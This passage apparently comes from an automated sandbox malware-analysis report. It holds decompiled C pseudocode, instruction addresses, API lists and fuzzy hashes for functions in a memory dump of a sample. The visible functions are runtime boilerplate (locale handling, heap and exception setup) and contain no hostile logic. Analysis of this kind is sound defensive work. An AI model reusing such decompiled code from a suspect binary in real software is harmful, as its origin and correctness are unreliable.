                                                                                      				} while (_t11 != 0);
                                                                                      				_t4 = _t19 - _t25 >> 1 == 3;
                                                                                      				 *(_t27 + 0x60) = 0 | _t4;
                                                                                      				if(_t4 != 0) {
                                                                                      					_t24 = E0042B4D0( *((intOrPtr*)(_t27 + 0x50)));
                                                                                      				}
                                                                                      				 *((intOrPtr*)(_t27 + 0x5c)) = _t24;
                                                                                      				EnumSystemLocalesW(E0042B74F, 1);
                                                                                      				_t15 = _a4;
                                                                                      				if(( *_t15 & 0x00000004) == 0) {
                                                                                      					 *_t15 = 0;
                                                                                      					return _t15;
                                                                                      				}
                                                                                      				return _t15;
                                                                                      			}












                                                                                      0x0042b47e
                                                                                      0x0042b484
                                                                                      0x0042b485
                                                                                      0x0042b488
                                                                                      0x0042b48b
                                                                                      0x0042b48b
                                                                                      0x0042b48e
                                                                                      0x0042b490
                                                                                      0x0042b49e
                                                                                      0x0042b4a1
                                                                                      0x0042b4a4
                                                                                      0x0042b4af
                                                                                      0x0042b4af
                                                                                      0x0042b4b8
                                                                                      0x0042b4bb
                                                                                      0x0042b4c1
                                                                                      0x0042b4c7
                                                                                      0x0042b4c9
                                                                                      0x00000000
                                                                                      0x0042b4c9
                                                                                      0x0042b4cf

                                                                                      APIs
                                                                                        • Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
                                                                                        • Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636
                                                                                      • EnumSystemLocalesW.KERNEL32(0042B74F,00000001,00000000,?,-00000050,?,0042BAF1,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0042B4BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                      • String ID:
                                                                                      • API String ID: 2417226690-0
                                                                                      • Opcode ID: 7c21560e41ddf946b950b202b77448f7aa9be7eab15c110276edaf45683d380b
                                                                                      • Instruction ID: 09593bb10243a72730b8656f6155d18adf003b42f32ea2ebef070e7751e73f6f
                                                                                      • Opcode Fuzzy Hash: 7c21560e41ddf946b950b202b77448f7aa9be7eab15c110276edaf45683d380b
                                                                                      • Instruction Fuzzy Hash: 94F0F6363003186FDB14AF35ACC1A7B7BA1EF80768F55842EF9458B681D779AC42C798
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 83%
                                                                                      			E00422F0B(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                      				intOrPtr _t17;
                                                                                      				signed int _t29;
                                                                                      				void* _t31;
                                                                                      
                                                                                      				_push(0xc);
                                                                                      				_push(0x442030);
                                                                                      				E00413FF0(__ebx, __edi, __esi);
                                                                                      				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
                                                                                      				E0041BF62( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
                                                                                      				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
                                                                                      				 *0x444e20 = E0041D8BE( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
                                                                                      				_t29 = EnumSystemLocalesW(E00422EFE, 1);
                                                                                      				_t17 =  *0x443048; // 0x9900ec21
                                                                                      				 *0x444e20 = _t17;
                                                                                      				 *(_t31 - 0x1c) = _t29;
                                                                                      				 *(_t31 - 4) = 0xfffffffe;
                                                                                      				E00422F7B();
                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
                                                                                      				return _t29;
                                                                                      			}






                                                                                      0x00422f0b
                                                                                      0x00422f0d
                                                                                      0x00422f12
                                                                                      0x00422f17
                                                                                      0x00422f20
                                                                                      0x00422f26
                                                                                      0x00422f37
                                                                                      0x00422f49
                                                                                      0x00422f4b
                                                                                      0x00422f50
                                                                                      0x00422f55
                                                                                      0x00422f58
                                                                                      0x00422f5f
                                                                                      0x00422f69
                                                                                      0x00422f75

                                                                                      APIs
                                                                                        • Part of subcall function 0041BF62: EnterCriticalSection.KERNEL32(?,?,0041FBE7,00000000,00441E68,0000000C,0041FBAE,?,?,00420D1F,?,?,0042072E,00000001,00000364,?), ref: 0041BF71
                                                                                      • EnumSystemLocalesW.KERNEL32(00422EFE,00000001,00442030,0000000C,0042332D,00000000), ref: 00422F43
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                      • String ID:
                                                                                      • API String ID: 1272433827-0
                                                                                      • Opcode ID: a47d44a5e4e41d2e69ef6405ec93742fcd48ff33a92604e3cc96b366dca287e9
                                                                                      • Instruction ID: 89c38d8e70bf401b92573effb85ba13ad009fefcd96bf8d34471be70a7cddc4e
                                                                                      • Opcode Fuzzy Hash: a47d44a5e4e41d2e69ef6405ec93742fcd48ff33a92604e3cc96b366dca287e9
                                                                                      • Instruction Fuzzy Hash: 89F03C76A00200EFD700EF58E942B9977B0FB49725F10412BF910972E0C7B959408B48
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0042B38B(void* __ecx, void* __edx, signed char* _a4) {
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				intOrPtr _t9;
                                                                                      				signed char* _t13;
                                                                                      				intOrPtr* _t15;
                                                                                      				void* _t19;
                                                                                      				void* _t21;
                                                                                      				void* _t22;
                                                                                      
                                                                                      				_t19 = E00420590(__ecx, __edx, _t21);
                                                                                      				_t15 =  *((intOrPtr*)(_t19 + 0x54));
                                                                                      				_t22 = _t15 + 2;
                                                                                      				do {
                                                                                      					_t9 =  *_t15;
                                                                                      					_t15 = _t15 + 2;
                                                                                      				} while (_t9 != 0);
                                                                                      				 *(_t19 + 0x64) = 0 | _t15 - _t22 >> 0x00000001 == 0x00000003;
                                                                                      				EnumSystemLocalesW(0x42b2e4, 1);
                                                                                      				_t13 = _a4;
                                                                                      				if(( *_t13 & 0x00000004) == 0) {
                                                                                      					 *_t13 = 0;
                                                                                      					return _t13;
                                                                                      				}
                                                                                      				return _t13;
                                                                                      			}











                                                                                      0x0042b397
                                                                                      0x0042b39b
                                                                                      0x0042b39e
                                                                                      0x0042b3a1
                                                                                      0x0042b3a1
                                                                                      0x0042b3a4
                                                                                      0x0042b3a7
                                                                                      0x0042b3bf
                                                                                      0x0042b3c2
                                                                                      0x0042b3c8
                                                                                      0x0042b3ce
                                                                                      0x0042b3d0
                                                                                      0x00000000
                                                                                      0x0042b3d0
                                                                                      0x0042b3d5

                                                                                      APIs
                                                                                        • Part of subcall function 00420590: GetLastError.KERNEL32(?,00000008,00427C89), ref: 00420594
                                                                                        • Part of subcall function 00420590: SetLastError.KERNEL32(00000000,?,00000008,000000FF), ref: 00420636
                                                                                      • EnumSystemLocalesW.KERNEL32(0042B2E4,00000001,00000000,?,?,0042BB4F,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0042B3C2
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                      • String ID:
                                                                                      • API String ID: 2417226690-0
                                                                                      • Opcode ID: 5258e3358ba57a5c14de2a6c208006c50e95af83b32f1d3d8181a8ca6be8f280
                                                                                      • Instruction ID: f05ec71404ababf8a8de12aa76609f2cff9ccbbcd907959a5a23f0dfaf3840ce
                                                                                      • Opcode Fuzzy Hash: 5258e3358ba57a5c14de2a6c208006c50e95af83b32f1d3d8181a8ca6be8f280
                                                                                      • Instruction Fuzzy Hash: 2AF0A0363002196BCB04DF36E84566ABB94EF82714B5A405AEE058B251C6799982C798
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E00413F2C() {
                                                                                      
                                                                                      				return SetUnhandledExceptionFilter(E00413F38);
                                                                                      			}



                                                                                      0x00413f37

                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00013F38,00413485), ref: 00413F31
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: 98a43fc2f77659a5b080a95a43e1b7ac22015822af1f6f731b6c7803508620d2
                                                                                      • Instruction ID: d60b6e1cad0b80fe3fc268bdcce277321658407d7a69439cd70f39f9138d5e7f
                                                                                      • Opcode Fuzzy Hash: 98a43fc2f77659a5b080a95a43e1b7ac22015822af1f6f731b6c7803508620d2
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0042BCAF() {
                                                                                      				signed int _t3;
                                                                                      
                                                                                      				_t3 = GetProcessHeap();
                                                                                      				 *0x444f1c = _t3;
                                                                                      				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                                                                                      			}




                                                                                      0x0042bcaf
                                                                                      0x0042bcb7
                                                                                      0x0042bcbf

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: HeapProcess
                                                                                      • String ID:
                                                                                      • API String ID: 54951025-0
                                                                                      • Opcode ID: 3c87e93bf37a240b314e6df6c36cdddcf6e1c06a3cfb8bfc48fb69f960f24d71
                                                                                      • Instruction ID: 939d0f99279682e252f0708f7657d5826cd6ae4f0c5921c56d439cf077b71eff
                                                                                      • Opcode Fuzzy Hash: 3c87e93bf37a240b314e6df6c36cdddcf6e1c06a3cfb8bfc48fb69f960f24d71
                                                                                      • Instruction Fuzzy Hash: C4A02230300200CF83008F32AF0830C3AFCAA8AAC33008038A008C0030FB388B808F08
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 57%
                                                                                      			E00408400(void* __ebx, void* __edx, void* __edi, signed int __esi, char _a4) {
                                                                                      				char _v0;
                                                                                      				char _v4;
                                                                                      				signed int _v8;
                                                                                      				char _v12;
                                                                                      				char _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _v32;
                                                                                      				signed int _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int _v44;
                                                                                      				signed int _v48;
                                                                                      				signed int _v52;
                                                                                      				signed int _v56;
                                                                                      				signed int _v60;
                                                                                      				signed int _v64;
                                                                                      				signed int _v68;
                                                                                      				signed int _v72;
                                                                                      				signed int _v76;
                                                                                      				signed int _v80;
                                                                                      				signed int _v84;
                                                                                      				signed int _v88;
                                                                                      				char _v92;
                                                                                      				intOrPtr _v100;
                                                                                      				signed int _v112;
                                                                                      				char _v120;
                                                                                      				signed int _v124;
                                                                                      				intOrPtr _v128;
                                                                                      				char _v132;
                                                                                      				signed int _v140;
                                                                                      				intOrPtr _v204;
                                                                                      				signed int _v216;
                                                                                      				char _v224;
                                                                                      				signed int _v228;
                                                                                      				intOrPtr _v236;
                                                                                      				char _v240;
                                                                                      				signed int _v244;
                                                                                      				signed int _v264;
                                                                                      				signed int _v276;
                                                                                      				signed int _v288;
                                                                                      				signed int _v300;
                                                                                      				signed int _v320;
                                                                                      				signed int _v332;
                                                                                      				signed int _v356;
                                                                                      				signed int _t276;
                                                                                      				signed int _t277;
                                                                                      				signed int _t280;
                                                                                      				signed int _t284;
                                                                                      				signed int _t287;
                                                                                      				signed int _t292;
                                                                                      				signed int _t293;
                                                                                      				signed int _t296;
                                                                                      				signed int _t300;
                                                                                      				signed int _t303;
                                                                                      				signed int _t308;
                                                                                      				signed int _t309;
                                                                                      				void* _t316;
                                                                                      				void* _t317;
                                                                                      				intOrPtr _t318;
                                                                                      				signed int _t345;
                                                                                      				unsigned int _t347;
                                                                                      				void* _t348;
                                                                                      				signed int _t363;
                                                                                      				signed int _t365;
                                                                                      				signed int _t367;
                                                                                      				unsigned int _t369;
                                                                                      				void* _t370;
                                                                                      				signed int _t373;
                                                                                      				signed int _t386;
                                                                                      				signed int _t388;
                                                                                      				signed int _t390;
                                                                                      				unsigned int _t392;
                                                                                      				void* _t393;
                                                                                      				signed int _t402;
                                                                                      				signed int _t404;
                                                                                      				void* _t408;
                                                                                      				signed int _t413;
                                                                                      				signed int _t414;
                                                                                      				signed int _t419;
                                                                                      				signed int _t420;
                                                                                      				signed int _t421;
                                                                                      				signed int _t422;
                                                                                      				signed int _t423;
                                                                                      				signed int _t424;
                                                                                      				void* _t435;
                                                                                      				signed int _t440;
                                                                                      				signed int _t441;
                                                                                      				signed int _t446;
                                                                                      				signed int _t447;
                                                                                      				signed int _t448;
                                                                                      				signed int _t449;
                                                                                      				signed int _t450;
                                                                                      				signed int _t451;
                                                                                      				void* _t462;
                                                                                      				signed int* _t466;
                                                                                      				signed int _t467;
                                                                                      				void* _t468;
                                                                                      				intOrPtr _t469;
                                                                                      				signed int _t470;
                                                                                      				void* _t471;
                                                                                      				signed int _t472;
                                                                                      				void* _t473;
                                                                                      				signed int* _t474;
                                                                                      				signed int* _t475;
                                                                                      				signed int _t483;
                                                                                      				intOrPtr _t491;
                                                                                      				signed int _t499;
                                                                                      				intOrPtr _t505;
                                                                                      				signed int* _t506;
                                                                                      				void* _t510;
                                                                                      				signed int _t514;
                                                                                      				void* _t516;
                                                                                      				void* _t523;
                                                                                      				void* _t526;
                                                                                      				void* _t536;
                                                                                      				intOrPtr _t538;
                                                                                      				signed int _t539;
                                                                                      				signed int _t540;
                                                                                      				signed int _t541;
                                                                                      				intOrPtr _t545;
                                                                                      				signed int _t547;
                                                                                      				signed int _t548;
                                                                                      				signed int _t550;
                                                                                      				void* _t551;
                                                                                      				signed int _t552;
                                                                                      				signed int _t553;
                                                                                      				void* _t554;
                                                                                      				signed int _t555;
                                                                                      				signed int _t556;
                                                                                      				void* _t557;
                                                                                      				signed int _t559;
                                                                                      				signed int _t571;
                                                                                      				void* _t572;
                                                                                      				signed int _t573;
                                                                                      				void* _t574;
                                                                                      				intOrPtr _t575;
                                                                                      				signed int _t576;
                                                                                      				void* _t577;
                                                                                      				signed int _t578;
                                                                                      				signed int _t580;
                                                                                      				signed int _t581;
                                                                                      				intOrPtr _t582;
                                                                                      				void* _t584;
                                                                                      				signed int _t585;
                                                                                      				signed int _t588;
                                                                                      				signed int _t589;
                                                                                      				signed int _t591;
                                                                                      				signed int _t594;
                                                                                      				signed int _t595;
                                                                                      				signed int _t597;
                                                                                      				signed int _t600;
                                                                                      				signed int _t602;
                                                                                      				signed int _t606;
                                                                                      				signed int _t608;
                                                                                      				signed int _t610;
                                                                                      				void* _t612;
                                                                                      				void* _t614;
                                                                                      				void* _t615;
                                                                                      				signed int _t624;
                                                                                      				void* _t625;
                                                                                      				signed int _t627;
                                                                                      				void* _t628;
                                                                                      				signed int _t630;
                                                                                      				void* _t631;
                                                                                      				void* _t633;
                                                                                      				void* _t634;
                                                                                      				signed int _t635;
                                                                                      				void* _t652;
                                                                                      				void* _t654;
                                                                                      
                                                                                      				_t570 = __esi;
                                                                                      				_t536 = __edx;
                                                                                      				_t606 = _t624;
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x431c0c);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_t625 = _t624 - 0x48;
                                                                                      				_t276 =  *0x443048; // 0x9900ec21
                                                                                      				_t277 = _t276 ^ _t606;
                                                                                      				_v20 = _t277;
                                                                                      				_push(__ebx);
                                                                                      				_push(__esi);
                                                                                      				_push(__edi);
                                                                                      				_push(_t277);
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_t3 =  &_a4; // 0x403c79
                                                                                      				_t466 =  *_t3;
                                                                                      				_t482 =  &_v28;
                                                                                      				_v24 = _t466;
                                                                                      				E0041247D( &_v28, 0);
                                                                                      				_v8 = 0;
                                                                                      				_t550 =  *0x444fcc; // 0x2
                                                                                      				_t280 =  *0x444f4c; // 0x7fb5d0
                                                                                      				_v36 = _t280;
                                                                                      				if(_t550 == 0) {
                                                                                      					__ecx =  &_v32;
                                                                                      					__eax = E0041247D( &_v32, __edi);
                                                                                      					__eflags =  *0x444fcc - __edi; // 0x2
                                                                                      					if(__eflags == 0) {
                                                                                      						__eax =  *0x444310; // 0x2
                                                                                      						__eax = __eax + 1;
                                                                                      						__eflags = __eax;
                                                                                      						 *0x444310 = __eax;
                                                                                      						 *0x444fcc = __eax;
                                                                                      					}
                                                                                      					__ecx =  &_v32;
                                                                                      					__eax = E004124D5(__ecx);
                                                                                      					__edi =  *0x444fcc; // 0x2
                                                                                      				}
                                                                                      				_t483 = _t466[1];
                                                                                      				_t467 = _t550 * 4;
                                                                                      				__eflags = _t550 -  *((intOrPtr*)(_t483 + 0xc));
                                                                                      				if(_t550 >=  *((intOrPtr*)(_t483 + 0xc))) {
                                                                                      					_t571 = 0;
                                                                                      					__eflags = 0;
                                                                                      					goto L17;
                                                                                      				} else {
                                                                                      					_t571 =  *(_t467 +  *((intOrPtr*)(_t483 + 8)));
                                                                                      					__eflags = _t571;
                                                                                      					if(_t571 == 0) {
                                                                                      						L17:
                                                                                      						__eflags =  *((char*)(_t483 + 0x14));
                                                                                      						if( *((char*)(_t483 + 0x14)) == 0) {
                                                                                      							L20:
                                                                                      							__eflags = _t571;
                                                                                      							if(_t571 != 0) {
                                                                                      								goto L15;
                                                                                      							} else {
                                                                                      								goto L21;
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t462 = E0041265A();
                                                                                      							__eflags = _t550 -  *((intOrPtr*)(_t462 + 0xc));
                                                                                      							if(_t550 >=  *((intOrPtr*)(_t462 + 0xc))) {
                                                                                      								L21:
                                                                                      								_t284 = _v36;
                                                                                      								__eflags = _t284;
                                                                                      								if(__eflags == 0) {
                                                                                      									_t571 = E0041362C(_t467, _t550, _t571, __eflags, 8);
                                                                                      									_t627 = _t625 + 4;
                                                                                      									_v36 = _t571;
                                                                                      									_t40 = _v24 + 4; // 0x428d0824
                                                                                      									_t287 =  *_t40;
                                                                                      									__eflags = _t287;
                                                                                      									if(_t287 == 0) {
                                                                                      										_t552 = 0x43e90c;
                                                                                      									} else {
                                                                                      										_t552 =  *(_t287 + 0x18);
                                                                                      										__eflags = _t552;
                                                                                      										if(_t552 == 0) {
                                                                                      											_t42 = _t287 + 0x1c; // 0x428d0840
                                                                                      											_t552 = _t42;
                                                                                      										}
                                                                                      									}
                                                                                      									E0041247D( &_v88, 0);
                                                                                      									_v84 = 0;
                                                                                      									_v80 = 0;
                                                                                      									_v76 = 0;
                                                                                      									_v72 = 0;
                                                                                      									_v68 = 0;
                                                                                      									_v64 = 0;
                                                                                      									_v60 = 0;
                                                                                      									_v56 = 0;
                                                                                      									_v52 = 0;
                                                                                      									_v48 = 0;
                                                                                      									_v44 = 0;
                                                                                      									_v40 = 0;
                                                                                      									_v8 = 8;
                                                                                      									__eflags = _t552;
                                                                                      									if(_t552 == 0) {
                                                                                      										E00412430("bad locale name");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										_push(_t606);
                                                                                      										_t608 = _t627;
                                                                                      										_push(0xffffffff);
                                                                                      										_push(0x431c0c);
                                                                                      										_push( *[fs:0x0]);
                                                                                      										_t628 = _t627 - 0x48;
                                                                                      										_t292 =  *0x443048; // 0x9900ec21
                                                                                      										_t293 = _t292 ^ _t608;
                                                                                      										_v124 = _t293;
                                                                                      										_push(_t467);
                                                                                      										_push(_t571);
                                                                                      										_push(_t552);
                                                                                      										_push(_t293);
                                                                                      										 *[fs:0x0] =  &_v120;
                                                                                      										_t469 = _v100;
                                                                                      										_v128 = _t469;
                                                                                      										E0041247D( &_v132, 0);
                                                                                      										_v112 = 0;
                                                                                      										_t553 =  *0x444fc8; // 0x0
                                                                                      										_t296 =  *0x444f44; // 0x0
                                                                                      										_v140 = _t296;
                                                                                      										__eflags = _t553;
                                                                                      										if(_t553 == 0) {
                                                                                      											E0041247D( &_v36, _t553);
                                                                                      											__eflags =  *0x444fc8 - _t553; // 0x0
                                                                                      											if(__eflags == 0) {
                                                                                      												_t440 =  *0x444310; // 0x2
                                                                                      												_t441 = _t440 + 1;
                                                                                      												__eflags = _t441;
                                                                                      												 *0x444310 = _t441;
                                                                                      												 *0x444fc8 = _t441;
                                                                                      											}
                                                                                      											E004124D5( &_v36);
                                                                                      											_t553 =  *0x444fc8; // 0x0
                                                                                      										}
                                                                                      										_t86 = _t469 + 4; // 0x0
                                                                                      										_t491 =  *_t86;
                                                                                      										_t470 = _t553 * 4;
                                                                                      										__eflags = _t553 -  *((intOrPtr*)(_t491 + 0xc));
                                                                                      										if(_t553 >=  *((intOrPtr*)(_t491 + 0xc))) {
                                                                                      											_t573 = 0;
                                                                                      											__eflags = 0;
                                                                                      											goto L50;
                                                                                      										} else {
                                                                                      											_t573 =  *(_t470 +  *((intOrPtr*)(_t491 + 8)));
                                                                                      											__eflags = _t573;
                                                                                      											if(_t573 == 0) {
                                                                                      												L50:
                                                                                      												__eflags =  *((char*)(_t491 + 0x14));
                                                                                      												if( *((char*)(_t491 + 0x14)) == 0) {
                                                                                      													L53:
                                                                                      													__eflags = _t573;
                                                                                      													if(_t573 != 0) {
                                                                                      														goto L48;
                                                                                      													} else {
                                                                                      														goto L54;
                                                                                      													}
                                                                                      												} else {
                                                                                      													_t435 = E0041265A();
                                                                                      													__eflags = _t553 -  *((intOrPtr*)(_t435 + 0xc));
                                                                                      													if(_t553 >=  *((intOrPtr*)(_t435 + 0xc))) {
                                                                                      														L54:
                                                                                      														_t300 = _v40;
                                                                                      														__eflags = _t300;
                                                                                      														if(__eflags == 0) {
                                                                                      															_t573 = E0041362C(_t470, _t553, _t573, __eflags, 8);
                                                                                      															_t630 = _t628 + 4;
                                                                                      															_v40 = _t573;
                                                                                      															_t101 = _v28 + 4; // 0xd88b04c4
                                                                                      															_t303 =  *_t101;
                                                                                      															__eflags = _t303;
                                                                                      															if(_t303 == 0) {
                                                                                      																_t555 = 0x43e90c;
                                                                                      															} else {
                                                                                      																_t555 =  *(_t303 + 0x18);
                                                                                      																__eflags = _t555;
                                                                                      																if(_t555 == 0) {
                                                                                      																	_t103 = _t303 + 0x1c; // 0xd88b04e0
                                                                                      																	_t555 = _t103;
                                                                                      																}
                                                                                      															}
                                                                                      															E0041247D( &_v92, 0);
                                                                                      															_v88 = 0;
                                                                                      															_v84 = 0;
                                                                                      															_v80 = 0;
                                                                                      															_v76 = 0;
                                                                                      															_v72 = 0;
                                                                                      															_v68 = 0;
                                                                                      															_v64 = 0;
                                                                                      															_v60 = 0;
                                                                                      															_v56 = 0;
                                                                                      															_v52 = 0;
                                                                                      															_v48 = 0;
                                                                                      															_v44 = 0;
                                                                                      															_v12 = 8;
                                                                                      															__eflags = _t555;
                                                                                      															if(_t555 == 0) {
                                                                                      																E00412430("bad locale name");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																asm("int3");
                                                                                      																_push(_t608);
                                                                                      																_t610 = _t630;
                                                                                      																_push(0xffffffff);
                                                                                      																_push(0x431c55);
                                                                                      																_push( *[fs:0x0]);
                                                                                      																_t631 = _t630 - 0x14;
                                                                                      																_t308 =  *0x443048; // 0x9900ec21
                                                                                      																_t309 = _t308 ^ _t610;
                                                                                      																_v228 = _t309;
                                                                                      																_push(_t470);
                                                                                      																_push(_t573);
                                                                                      																_push(_t555);
                                                                                      																_push(_t309);
                                                                                      																 *[fs:0x0] =  &_v224;
                                                                                      																_t575 = _v204;
                                                                                      																_v236 = _t575;
                                                                                      																E0041247D( &_v240, 0);
                                                                                      																_v216 = 0;
                                                                                      																_t556 =  *0x444fd0; // 0x0
                                                                                      																_t472 =  *0x444f40; // 0x0
                                                                                      																_v244 = _t472;
                                                                                      																__eflags = _t556;
                                                                                      																if(_t556 == 0) {
                                                                                      																	E0041247D( &_v32, _t556);
                                                                                      																	__eflags =  *0x444fd0 - _t556; // 0x0
                                                                                      																	if(__eflags == 0) {
                                                                                      																		_t413 =  *0x444310; // 0x2
                                                                                      																		_t414 = _t413 + 1;
                                                                                      																		__eflags = _t414;
                                                                                      																		 *0x444310 = _t414;
                                                                                      																		 *0x444fd0 = _t414;
                                                                                      																	}
                                                                                      																	E004124D5( &_v32);
                                                                                      																	_t556 =  *0x444fd0; // 0x0
                                                                                      																}
                                                                                      																_t537 =  *(_t575 + 4);
                                                                                      																_t499 = _t556 * 4;
                                                                                      																_v32 = _t499;
                                                                                      																__eflags = _t556 -  *((intOrPtr*)(_t537 + 0xc));
                                                                                      																if(_t556 >=  *((intOrPtr*)(_t537 + 0xc))) {
                                                                                      																	_t576 = 0;
                                                                                      																	__eflags = 0;
                                                                                      																	_v32 = _t499;
                                                                                      																	goto L83;
                                                                                      																} else {
                                                                                      																	_t576 =  *(_t499 +  *((intOrPtr*)(_t537 + 8)));
                                                                                      																	__eflags = _t576;
                                                                                      																	if(_t576 != 0) {
                                                                                      																		L91:
                                                                                      																		E004124D5( &_v40);
                                                                                      																		 *[fs:0x0] = _v24;
                                                                                      																		_pop(_t557);
                                                                                      																		_pop(_t577);
                                                                                      																		_pop(_t473);
                                                                                      																		__eflags = _v28 ^ _t610;
                                                                                      																		return E0041361E(_t576, _t473, _v28 ^ _t610, _t537, _t557, _t577);
                                                                                      																	} else {
                                                                                      																		L83:
                                                                                      																		__eflags =  *((char*)(_t537 + 0x14));
                                                                                      																		if( *((char*)(_t537 + 0x14)) == 0) {
                                                                                      																			L86:
                                                                                      																			__eflags = _t576;
                                                                                      																			if(_t576 != 0) {
                                                                                      																				goto L91;
                                                                                      																			} else {
                                                                                      																				goto L87;
                                                                                      																			}
                                                                                      																		} else {
                                                                                      																			_t408 = E0041265A();
                                                                                      																			__eflags = _t556 -  *((intOrPtr*)(_t408 + 0xc));
                                                                                      																			if(_t556 >=  *((intOrPtr*)(_t408 + 0xc))) {
                                                                                      																				L87:
                                                                                      																				__eflags = _t472;
                                                                                      																				if(_t472 == 0) {
                                                                                      																					_t316 = E00408E80(_t472, _t556, _t576,  &_v44, _v36);
                                                                                      																					_t633 = _t631 + 8;
                                                                                      																					__eflags = _t316 - 0xffffffff;
                                                                                      																					if(__eflags == 0) {
                                                                                      																						_t317 = E00403390();
                                                                                      																						asm("int3");
                                                                                      																						asm("int3");
                                                                                      																						asm("int3");
                                                                                      																						asm("int3");
                                                                                      																						asm("int3");
                                                                                      																						_push(_t610);
                                                                                      																						_t612 = _t633;
                                                                                      																						_push(_t576);
                                                                                      																						_push(_t556);
                                                                                      																						_t550 = _t537;
                                                                                      																						_t578 = _t499;
                                                                                      																						__eflags = _t578 - _t550;
                                                                                      																						if(_t578 == _t550) {
                                                                                      																							L101:
                                                                                      																							return _t317;
                                                                                      																						} else {
                                                                                      																							do {
                                                                                      																								_t505 =  *((intOrPtr*)(_t578 + 0x14));
                                                                                      																								__eflags = _t505 - 0x10;
                                                                                      																								if(_t505 < 0x10) {
                                                                                      																									goto L100;
                                                                                      																								} else {
                                                                                      																									_t318 =  *_t578;
                                                                                      																									_t506 = _t505 + 1;
                                                                                      																									__eflags = _t506 - 0x1000;
                                                                                      																									if(_t506 < 0x1000) {
                                                                                      																										L99:
                                                                                      																										_push(_t506);
                                                                                      																										_t317 = E004138AD(_t318);
                                                                                      																										_t633 = _t633 + 8;
                                                                                      																										goto L100;
                                                                                      																									} else {
                                                                                      																										_t538 =  *((intOrPtr*)(_t318 - 4));
                                                                                      																										_t506 =  &(_t506[8]);
                                                                                      																										__eflags = _t318 - _t538 + 0xfffffffc - 0x1f;
                                                                                      																										if(_t318 - _t538 + 0xfffffffc > 0x1f) {
                                                                                      																											E0041805F(_t472, _t506, _t538);
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
                                                                                      																											asm("int3");
